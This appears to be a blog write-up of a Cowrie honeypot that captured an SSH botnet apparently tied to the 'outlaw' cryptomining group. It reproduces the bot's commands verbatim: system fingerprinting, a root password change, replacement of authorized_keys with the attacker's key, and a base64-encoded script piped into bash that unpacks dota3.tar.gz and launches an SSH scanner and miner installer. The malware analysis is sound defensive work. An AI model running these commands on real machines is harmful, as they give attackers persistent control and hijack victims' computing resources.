This botnet used ssh commands to analyze the victim machine, and then downloaded a payload using SFTP. The botnet was able to get in using the credentials root:1qaz@WSX. I had setup this particular login because I had seen that it was being used by other attackers. If you look your keyboard, you can see why people would set their password as 1qaz@WSX. I saw 280 unique ip addresses run the exact same commands 810 times (most importantly adding the same SSH key), leading me to believe that they are part of the same botnet. Immediately after logging in, they tried the credentials knockknockwhosthere,knockknockwhosthere. This is most likely used to detect honeypots that allow all username/password combinations.
After logging into my honeypot, they ran the following commands:
cat /proc/cpuinfo | grep name | wc -l
echo \"root:f5zlK5cYjpkk\"|chpasswd|bash
#They all had a slightly different password set on this one
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
ls -lh $(which ls)
which ls
crontab -l
w
uname -m
cat /proc/cpuinfo | grep model | grep name | wc -l
free -m -h | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
top
uname
uname -m
lscpu | grep Model
cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
I would guess that this botnet is for cryptocurrency mining, given that it checks how many CPU cores I have, available memory, what is running, and what architecture and CPU model I have. After doing these checks, it removes all existing SSH keys and add its own (Update, the botnet seems to have updated, and now uses >> instead of >). At first the botnet was not dropping a payload, so I changed cowries default /proc/cpuinfo, /proc/meminfo, and lscpu output. By default, cowrie makes meminfo and cpuinfo look like a Core Duo, and 4G of RAM. Not a great target for a cryptocurrency mining malware. I also made a small change to Cowrie that allows any public key to login (ended up only being one line of code!). After making these changes the botnet now downloads a file called dota3.tar.gz (2.7M). It then runs these commands
cat /var/tmp/.systemcache436621
rm -rf /var/tmp/dota*
cat /var/tmp/.systemcache436621
echo "1" > /var/tmp/.systemcache436621
cat /var/tmp/.systemcache436621
sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApybSAtcmYgLlgxOS11bml4CnJtIC1yZiAuWDIqCm1rZGlyIC5YMjUtdW5peApjZCAuWDI1LXVuaXgKbXYgL3Zhci90bXAvZG90YTMudGFyLmd6IGRvdGEzLnRhci5negp0YXIgeGYgZG90YTMudGFyLmd6CnNsZWVwIDNzICYmIGNkIC90bXAvLlgyNS11bml4Ly5yc3luYy9jCm5vaHVwIC90bXAvLlgyNS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxOTIuMTY4ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDhtICYmIG5vaHVwIC90bXAvLlgyNS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxNzIuMTYgPj4gL2Rldi9udWxsIDI+MSYKc2xlZXAgMjBtICYmIGNkIC4uOyAvdG1wLy5YMjUtdW5peC8ucnN5bmMvaW5pdGFsbCAyPjEmCmV4aXQgMA==" | base64 --decode | bash
I am not sure what it's doing with the file .systemcache436621. It may just be a check to see if this machine has been infected before. Then the bot sends base64 encoded commands, which are decoded to:
#!/bin/bash
cd /tmp
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
rm -rf .X2*
mkdir .X25-unix
cd .X25-unix
mv /var/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz
sleep 3s && cd /tmp/.X25-unix/.rsync/c
nohup /tmp/.X25-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.
168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X25-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/
up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X25-unix/.rsync/initall 2>1&
exit 0
A neat trick that this botnet employs, is that when you untar the file, you get an error message. The archive looks like it is incomplete, and tar fails after creating the directory .rsync. Unless you saw that the bot cd into /tmp/.X25-unix/.rsync/c or used "tar -v" (verbose), it would be hard to know the archive actually did contain something. Contained in .rsync, was some bash scripts and binaries.
Doing a quick google search on “mdrfckr” and the attackers key (“AAAAB3…”) gives quite a few results. I found an article detailing a malware from a group called “outlaw” which used SSH brute force and the Shell Shock vulnerability to spread. The article describes the malware as installing “a complete hacking suite, composed of an IRC bot, an SSH scanner, a brute force tool, and an XMRIG crypto-miner”. There was also someone on AskUbuntu who could not figure out why a "Strange Cron Job Takes up 100% of CPU".